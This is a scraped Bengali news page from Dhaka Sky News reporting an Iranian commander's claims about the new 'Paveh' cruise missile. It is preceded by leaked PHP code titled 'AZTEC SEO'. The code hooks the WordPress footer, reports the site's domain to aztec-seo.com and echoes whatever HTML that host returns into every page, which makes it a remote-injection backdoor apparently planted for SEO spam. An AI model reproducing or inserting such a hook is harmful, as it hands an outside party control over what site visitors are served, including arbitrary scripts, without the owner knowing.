/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ইরানের নতুন ক্রুজ ক্ষেপণাস্ত্রের নাগালে ইসরাইল | Dhaka Sky News

আওয়ামী লীগ ক্ষমতায় আসলে দেশের উন্নতি হয় : প্রধানমন্ত্রী

আগের সংবাদ

এবার ডেকেছে ছাত্রলীগ, পুরো পথে নিরাপত্তা চান ফুলপরী

পরের সংবাদ

ইরানের নতুন ক্রুজ ক্ষেপণাস্ত্রের নাগালে ইসরাইল

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: February 26, 2023 , 10:31 am

ইরান ‘পাভেহ’ নামে এক হাজার ৬৫০ কিলোমিটার পাল্লার নতুন একটি ক্রুজ ক্ষেপণাস্ত্র তৈরি করেছে, যা ইহুদিবাদী রাষ্ট্র ইসরাইলে গিয়ে আঘাত হানতে পারে।
ইসলামি বিপ্লবী গার্ড বাহিনী বা আইআরজিসির অ্যারোস্পেস ফোর্স এ ক্ষেপণাস্ত্র তৈরি করেছে। খবর আরব নিউজ ও টাইমস অব ইসরাইলের।
অ্যারোস্পেস ফোর্সের কমান্ডার ব্রিগেডিয়ার জেনারেল আমির আলি হাজিজাদে রাষ্ট্রীয় টিভি চ্যানেল ‘খাবার’-কে দেওয়া এক সাক্ষাৎকারে বলেছেন, পাভেহ হচ্ছে ইরানের তৈরি অত্যাধুনিক ক্রুজ ক্ষেপণাস্ত্র।
এর আগে সুমার, হুয়াইযা ও তালাইয়া নামে ক্রুজ ক্ষেপণাস্ত্র তৈরি করেছে দেশটি। এগুলোর পাল্লা তুলনামূলক কম ছিল। এখন বেশিপাল্লার পাভেহ ক্ষেপণাস্ত্রও এগুলোর সঙ্গে যুক্ত হয়েছে।’
ইরানের কাছে হাইপারসনিক ব্যালিস্টিক ক্ষেপণাস্ত্র রয়েছে জানিয়ে হাজিজাদে বলেন, ইরানের তৈরি হাইপারসনিক ক্ষেপণাস্ত্র মোকাবিলার ক্ষমতা কারও নেই। কোনো দেশই এ ক্ষেপণাস্ত্র মোকাবিলার জন্য আকাশ প্রতিরক্ষা ব্যবস্থা বানাতে পারবে না।
তিনি বলেন, ক্ষেপণাস্ত্রের গতিবিধির ভিত্তিতে এর পরবর্তী অবস্থানটা কোনো পয়েন্টে হবে তা ধারণা করার মাধ্যমে শত্রæদের ক্ষেপণাস্ত্র প্রতিরক্ষাব্যবস্থা কাজ করে।
কিন্তু ইরানের হাইপারসনিক ব্যালিস্টিক ক্ষেপণাস্ত্রের গতিবিধি সংক্রান্ত কোনো পূর্ব ধারণা পাওয়া শত্রæদের আকাশ প্রতিরক্ষা ব্যবস্থাগুলোর পক্ষে সম্ভব হবে না।